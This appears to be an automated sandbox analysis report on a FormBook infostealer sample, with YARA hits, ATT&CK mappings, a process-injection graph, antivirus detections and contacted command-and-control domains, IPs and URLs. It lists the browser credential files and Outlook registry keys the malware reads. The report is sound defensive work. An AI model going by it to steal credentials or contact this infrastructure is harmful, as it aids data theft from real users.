                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_81
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_XP
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_XPe
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_VISTA
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_7
                Source: OVZizpEU7Q.exeBinary or memory string: WIN_8
                Source: OVZizpEU7Q.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		1
                Taint Shared Content                		1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Windows Service                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS126
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Software Packing                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service                		1
                Timestomp                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items312
                Process Injection                		1
                DLL Side-Loading                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Masquerading                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587962 Sample: OVZizpEU7Q.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 33 www.oneeyetrousersnake.xyz 2->33 35 www.tals.xyz 2->35 37 18 other IPs or domains 2->37 49 Suricata IDS alerts for network traffic 2->49 51 Antivirus detection for URL or domain 2->51 53 Antivirus detection for dropped file 2->53 57 7 other signatures 2->57 10 OVZizpEU7Q.exe 3 2->10         started        15 armsvc.exe 2->15         started        signatures3 55 Performs DNS queries to domains with low reputation 35->55 process4 dnsIp5 45 pywolwnvd.biz 54.244.188.177, 49739, 80 AMAZON-02US United States 10->45 29 C:\Windows\System32\alg.exe, PE32+ 10->29 dropped 31 C:\Program Files (x86)\...\armsvc.exe, PE32 10->31 dropped 69 Binary is likely a compiled AutoIt script file 10->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->71 73 Writes to foreign memory regions 10->73 75 4 other signatures 10->75 17 svchost.exe 10->17         started        file6 signatures7 process8 signatures9 47 Maps a DLL or memory area into another process 17->47 20 CkszoACLEZHP.exe 17->20 injected process10 dnsIp11 39 www.montero-beauty.online 185.104.45.157, 50024, 50025, 50026 UKRAINE-ASUA Ukraine 20->39 41 www.dymar.shop 185.68.16.160, 50036, 50037, 50038 UKRAINE-ASUA Ukraine 20->41 43 11 other IPs or domains 20->43 59 Found direct / indirect Syscall (likely to bypass EDR) 20->59 24 choice.exe 13 20->24         started        signatures12 process13 signatures14 61 Tries to steal Mail credentials (via file / registry access) 24->61 63 Tries to harvest and steal browser information (history, passwords, etc) 24->63 65 Modifies the context of a thread in another process (thread injection) 24->65 67 2 other signatures 24->67 27 firefox.exe 24->27         started        process15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                OVZizpEU7Q.exe74%VirustotalBrowse
                OVZizpEU7Q.exe87%ReversingLabsWin32.Virus.Expiro
                OVZizpEU7Q.exe100%AviraW32/Infector.Gen
                OVZizpEU7Q.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Windows\System32\alg.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://54.244.188.177/8#100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=product/special0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=common/currency/currency0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=information/sitemap0%Avira URL Cloudsafe
                https://www.dymar.shop/o-nas0%Avira URL Cloudsafe
                http://www.50food.com/29r3/0%Avira URL Cloudsafe
                http://www.dymar.shop/p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                http://www.snyp.shop/4nyz/0%Avira URL Cloudsafe
                http://www.tals.xyz/h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/voucher0%Avira URL Cloudsafe
                http://www.tals.xyz0%Avira URL Cloudsafe
                http://www.maitreyatoys.world/ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                https://www.dymar.shop/image/catalog/favicon.png0%Avira URL Cloudsafe
                https://www.dymar.shop/0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4ND0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=sunnyz.store0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/u11p/100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=account/login0%Avira URL Cloudsafe
                http://www.8312zcksnu.bond/d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ==0%Avira URL Cloudsafe
                https://www.dymar.shop/informaciya-o-dostavke0%Avira URL Cloudsafe
                http://www.44ynh.top/tw1g/100%Avira URL Cloudmalware
                http://www.tals.xyz/h8xm/0%Avira URL Cloudsafe
                http://www.sunnyz.store/px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPT100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=account/wishlist0%Avira URL Cloudsafe
                http://www.maitreyatoys.world/ib68/0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/t846/0%Avira URL Cloudsafe
                http://www.oneeyetrousersnake.xyz/jcfc/0%Avira URL Cloudsafe
                http://www70.earbudsstore.shop/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/order0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/account0%Avira URL Cloudsafe
                http://www.beyondfitness.live/2eo9/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=product/compare0%Avira URL Cloudsafe
                https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpg0%Avira URL Cloudsafe
                https://hosting.xyz/wiki/hosting/errors/site-not-served/0%Avira URL Cloudsafe
                https://www.dymar.shop/usloviya-soglasheniya0%Avira URL Cloudsafe
                https://djwe.bekru.wgljk.cn/123.html0%Avira URL Cloudsafe
                http://www.d48dk.top/9ffw/0%Avira URL Cloudsafe
                http://54.244.188.177/100%Avira URL Cloudmalware
                http://www.montero-beauty.online/iwr0/0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=affiliate/login0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=account/register0%Avira URL Cloudsafe
                http://www.snyp.shop/4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                http://www.oneeyetrousersnake.xyz/jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=common/language/language0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=product/manufacturer0%Avira URL Cloudsafe
                https://www.dymar.shop/politika-bezopasnosti0%Avira URL Cloudsafe
                https://www.dymar.shop/image/catalog/DYMAR0%Avira URL Cloudsafe
                https://www.dymar.shop0%Avira URL Cloudsafe
                https://www.gandi.net/en/domain0%Avira URL Cloudsafe
                http://www.8312zcksnu.bond/d3gs/0%Avira URL Cloudsafe
                http://www.d48dk.top/9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                http://54.244.188.177/wlyolqts100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=information/contact0%Avira URL Cloudsafe
                https://www.dymar.shop/index.php?route=error/not_found&amp;bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G10%Avira URL Cloudsafe
                http://54.244.188.177/rO#100%Avira URL Cloudmalware
                https://www.ukraine.com.ua/$0%Avira URL Cloudsafe
                http://54.244.188.177/y#100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=account/return/add0%Avira URL Cloudsafe
                http://www.dymar.shop/p9ll/0%Avira URL Cloudsafe
                http://www.44ynh.top/tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPT100%Avira URL Cloudmalware
                https://www.dymar.shop/index.php?route=account/newsletter0%Avira URL Cloudsafe
                https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/0%Avira URL Cloudsafe
                http://www.montero-beauty.online/iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPT0%Avira URL Cloudsafe
                http://www.beyondfitness.live/2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ==0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  44ynh.top
                  		38.181.21.178
                  		truetrue
                    		unknown
                    www.50food.com
                    		147.255.21.187
                    		truetrue
                      		unknown
                      d48dk.top
                      		154.23.184.207
                      		truetrue
                        		unknown
                        s-part-0017.t-0009.t-msedge.net
                        		13.107.246.45
                        		truefalse
                          		high
                          ssbzmoy.biz
                          		18.141.10.107
                          		truefalse
                            		high
                            pywolwnvd.biz
                            		54.244.188.177
                            		truefalse
                              		high
                              www.duwixushx.xyz
                              		156.251.17.224
                              		truefalse
                                		high
                                www.dymar.shop
                                		185.68.16.160
                                		truetrue
                                  		unknown
                                  www.earbudsstore.shop
                                  		194.195.220.41
                                  		truetrue
                                    		unknown
                                    www.snyp.shop
                                    		13.248.169.48
                                    		truetrue
                                      		unknown
                                      www.beyondfitness.live
                                      		209.74.77.107
                                      		truetrue
                                        		unknown
                                        www.8312zcksnu.bond
                                        		38.165.29.234
                                        		truetrue
                                          		unknown
                                          www.montero-beauty.online
                                          		185.104.45.157
                                          		truetrue
                                            		unknown
                                            www.maitreyatoys.world
                                            		194.245.148.189
                                            		truetrue
                                              		unknown
                                              oneeyetrousersnake.xyz
                                              		63.250.43.134
                                              		truetrue
                                                		unknown
                                                www.tals.xyz
                                                		13.248.169.48
                                                		truefalse
                                                  		high
                                                  www.sunnyz.store
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.d48dk.top
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.44ynh.top
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.oneeyetrousersnake.xyz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.dymar.shop/p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.50food.com/29r3/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.snyp.shop/4nyz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.tals.xyz/h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.earbudsstore.shop/t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.8312zcksnu.bond/d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.maitreyatoys.world/ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.duwixushx.xyz/u11p/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.44ynh.top/tw1g/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.tals.xyz/h8xm/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sunnyz.store/px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.earbudsstore.shop/t846/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.maitreyatoys.world/ib68/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.oneeyetrousersnake.xyz/jcfc/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beyondfitness.live/2eo9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.d48dk.top/9ffw/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.montero-beauty.online/iwr0/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.snyp.shop/4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.oneeyetrousersnake.xyz/jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPTtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://pywolwnvd.biz/wlyolqtsfalse
                                                            		high
                                                            http://www.8312zcksnu.bond/d3gs/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.d48dk.top/9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPTtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.dymar.shop/p9ll/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.44ynh.top/tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPTtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.beyondfitness.live/2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ==true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.montero-beauty.online/iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPTtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabchoice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.dymar.shop/index.php?route=common/currency/currencyCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.dymar.shop/index.php?route=product/specialCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dymar.shop/index.php?route=account/voucherCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.dymar.shop/o-nasCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://54.244.188.177/8#OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.dymar.shop/index.php?route=information/sitemapCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tals.xyzCkszoACLEZHP.exe, 00000006.00000002.4762982458.0000000006367000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.dymar.shop/CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.dymar.shop/image/catalog/favicon.pngCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
